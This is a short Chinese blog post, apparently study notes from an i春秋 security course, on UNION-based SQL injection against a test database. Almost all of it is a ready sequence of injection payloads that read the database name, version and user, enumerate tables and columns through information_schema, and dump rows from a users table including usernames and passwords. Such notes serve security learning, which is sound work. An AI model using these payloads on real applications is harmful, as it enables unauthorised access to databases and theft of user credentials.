UNION SELECT 命令 SQL注入
SQL注入 第五周
i春秋 注入
发布日期:   2019-08-14
文章字数:   316
阅读时长:   1 分
阅读次数:  

1、查看当前数据库信息

and 2=1 union select  database(),version(),user(),4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9

2、通过tables表查询相关信息

and 1=2 union select (select group_concat(table_name,'~',table_schema,'~',column_name) from information_schema.columns where table_schema='content' or table_name='users' ),2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9

3、根据查询信息查看单个表的详细信息

第一个表

and 1=2 union select (select group_concat(id,'|',title,'|',value,'|',time,'|',ip) from test.content),2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9

第二个表

and 1=2 union select (select group_concat(id,'|',username,'|',passwd,'|',user_ip,'|',join_date) from test.users),2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9,10,
1,2,3,4,5,6,7,8,9

   转载规则


《UNION SELECT 命令 SQL注入》 Evolyutsiya 采用 知识共享署名 4.0 国际许可协议 进行许可。
  目录